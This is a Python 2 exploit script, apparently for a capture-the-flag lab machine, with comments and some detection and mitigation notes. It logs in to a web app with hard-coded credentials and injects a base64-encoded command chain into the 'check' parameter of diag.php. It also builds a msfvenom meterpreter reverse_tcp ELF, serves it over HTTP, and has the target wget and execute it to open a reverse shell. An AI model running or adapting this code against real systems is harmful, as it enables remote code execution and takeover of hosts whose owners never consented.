#!/usr/bin/python
import requests
import netifaces as ni
import time
import random,string
import base64
import os,subprocess,sys
# ANSI terminal colour escapes used only for console output; CEND resets the colour.
CPURP = '\033[95m'
CGREEN = '\033[92m'
CRED = '\033[91m'
CEND = '\033[0m'
def rce():
    """Generate a reverse-shell ELF, serve it over HTTP, and trigger it on the lab host.

    Python 2 script (print statements, ``SimpleHTTPServer``). It resolves the
    attacker's ``tun0`` address, builds an ELF with msfvenom, serves the current
    working directory on port 8000, logs in to the target web application and
    submits a base64-encoded shell command through the ``check`` parameter of
    ``diag.php``, which fetches and runs the ELF on the target.

    Returns:
        None. Calls ``sys.exit()`` when ``tun0`` has no IPv4 address or the
        local web server cannot be started.

    Detection / mitigation notes for the targeted application:
        - ``diag.php`` receives shell metacharacters (``&``, ``;``) inside a
          base64-encoded ``check`` value; server-side validation of that
          parameter against an allowlist (and not passing it to a shell) would
          stop this class of injection.
        - An outbound ``wget`` from the web server host to port 8000, followed
          by ``chmod 777`` and execution of a random 10-character file, is a
          high-signal indicator.
    """
    try:
        # The target must be able to reach this address for the reverse connection.
        ni.ifaddresses('tun0')
        ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr']
        port = 9191
    except:  # bare except: also catches KeyboardInterrupt/SystemExit
        print '{}[*]{} Failed to retrieve tun0 IP address. Is your VPN on?'.format(CRED,CEND)
        sys.exit()
    print '{}[*]{} Generating ELF...'.format(CPURP,CEND)
    # CSPRNG-backed random filename: 10 chars from [a-z0-9]. Using a fresh name
    # each run avoids clobbering files but gives a consistent length signature.
    filename = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(10))
    FNULL = open(os.devnull, 'w')  # never closed; lives until process exit
    # shell=True with a formatted string; ip/filename are locally derived, not user input.
    subprocess.call('msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={} LPORT={} -f elf -o {}'.format(ip,port,filename), shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
    try:
        # Single-string list with shell=True: the shell runs the first element as the
        # command line. SimpleHTTPServer exposes the whole current working directory,
        # not just the generated ELF.
        subprocess.Popen(["python -m SimpleHTTPServer 8000"], shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
        print '{}[*]{} Started web server at http://{}:8000/'.format(CGREEN,CEND,ip)
    except:  # bare except; Popen with shell=True rarely raises, so this is best-effort
        print '{}[*]{} Failed to start web server. Exiting...'.format(CRED,CEND)
        sys.exit()
    time.sleep(2)  # give the background server time to bind before the target fetches
    with requests.Session() as s:
        try:
            print '{}[*]{} Executing the payload...'.format(CPURP,CEND)
            # Authenticate with the hard-coded lab credentials; the session jar keeps PHPSESSID.
            r = s.post('http://10.10.10.105/', data={'username':'admin', 'password':'NET_45JDX23'})
            # NOTE(review): the Session would already send this cookie; the explicit
            # dict looks redundant but is harmless.
            cookie = {'PHPSESSID': requests.utils.dict_from_cookiejar(s.cookies)['PHPSESSID']}
            # Injected command chain: leading 'a' satisfies the expected input, '&' and ';'
            # break out of it. Encoded as base64 because that is what diag.php decodes.
            cmd='a&wget http://{0}:8000/{1};chmod 777 {1};./{1};ls'.format(ip,filename)
            payload = {'check':'{}'.format(base64.b64encode(cmd))}
            # The Timeout branch below is treated as success: presumably './{1}' keeps the
            # PHP request open, so a 5 s timeout doubles as the "payload launched" signal.
            s.post('http://10.10.10.105/diag.php',cookies=cookie,data=payload,timeout=5) # increase timeout if the box is busy
        except requests.exceptions.Timeout:
            print '{}[*]{} Payload sent. Please wait for a connection back'.format(CGREEN,CEND)
            # Cleanup of the local ELF and the web server happens only on this path;
            # on any other outcome both are left behind.
            subprocess.call('rm {}'.format(filename), shell=True)
            subprocess.call('pkill -f SimpleHTTPServer', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
        except:  # bare except swallows everything else, including the login failing
            print '{}[*]{} Something went wrong. Reset the box!'.format(CRED,CEND)
            pass  # no-op after print
if __name__ == '__main__':
    # Don't forget: msfconsole -qr msf.rc
    # Kill any SimpleHTTPServer left over from a previous run (see rce's cleanup
    # path, which only runs on a request timeout) so port 8000 is free.
    try:
        subprocess.call('pkill -f SimpleHTTPServer', shell=True)
    except:  # best-effort: failure to kill a stale server is not fatal
        pass
    rce()